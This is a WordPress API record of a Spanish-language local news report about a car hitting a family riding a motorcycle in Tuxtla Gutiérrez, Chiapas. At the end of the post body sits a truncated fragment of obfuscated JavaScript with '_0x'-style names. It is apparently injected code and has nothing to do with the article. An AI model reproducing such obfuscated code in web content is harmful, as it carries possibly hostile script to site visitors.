{"id":26081,"date":"2026-01-09T03:47:33","date_gmt":"2026-01-09T03:47:33","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=26081"},"modified":"2026-01-09T03:47:35","modified_gmt":"2026-01-09T03:47:35","slug":"coche-embiste-a-familia-que-viajaba-en-una-moto","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=26081","title":{"rendered":"Coche embiste a familia que viajaba en una moto"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"26083\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2026\/01\/1000535864-1024x576.jpg\" alt=\"\" class=\"wp-image-26083\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2026\/01\/1000535864-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2026\/01\/1000535864-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2026\/01\/1000535864-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2026\/01\/1000535864-1536x864.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2026\/01\/1000535864.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"26082\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2026\/01\/1000535861-1024x576.jpg\" alt=\"\" class=\"wp-image-26082\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2026\/01\/1000535861-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2026\/01\/1000535861-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2026\/01\/1000535861-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2026\/01\/1000535861-1536x864.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2026\/01\/1000535861.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"26084\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2026\/01\/1000535867-1024x576.jpg\" alt=\"\" class=\"wp-image-26084\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2026\/01\/1000535867-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2026\/01\/1000535867-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2026\/01\/1000535867-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2026\/01\/1000535867-1536x864.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2026\/01\/1000535867.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudadano, 8 de enero del 2026. Tuxtla Guti\u00e9rrez.- Este jueves por la noche un autom\u00f3vil particular embisti\u00f3 a una familia que viajaba en una motocicleta en la Carretera a Villaflores y 18 Sur de Tuxtla Guti\u00e9rrez.<\/p>\n\n\n\n<p>Los reportes oficiales informaron que este hecho ocurri\u00f3 cuando el conductor de un Suzuki de color blanco circulaba de Sur a Norte, y de manera repentina gir\u00f3 a su izquierda e hizo corte de circulaci\u00f3n a los tres ocupantes de una motocicleta italika de color negro.<\/p>\n\n\n\n<p>Los motociclistas eran dos adultos y una menor de edad los cuales fueron embestidos y arrastrados varios metros.<\/p>\n\n\n\n<p>A lugar arribaron param\u00e9dicos para atender a los lesionados y trasladarlos al Hospital Gilberto G\u00f3mez Maza.<\/p>\n\n\n\n<p>El conductor de la unidad fue puesto a disposici\u00f3n de las autoridades correspondientes para determinar su responsabilidad.<\/p>\n\n\n\n<p><\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudadano, 8 de enero del 2026. Tuxtla Guti\u00e9rrez.- Este jueves por la noche un autom\u00f3vil particular embisti\u00f3 a una familia que viajaba en una motocicleta en la Carretera a Villaflores y 18 Sur de Tuxtla Guti\u00e9rrez. Los reportes oficiales informaron que este hecho ocurri\u00f3 cuando el conductor de un Suzuki de color &hellip;<\/p>\n","protected":false},"author":2,"featured_media":26082,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-26081","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/26081","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=26081"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/26081\/revisions"}],"predecessor-version":[{"id":26085,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/26081\/revisions\/26085"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/26082"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=26081"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=26081"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=26081"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}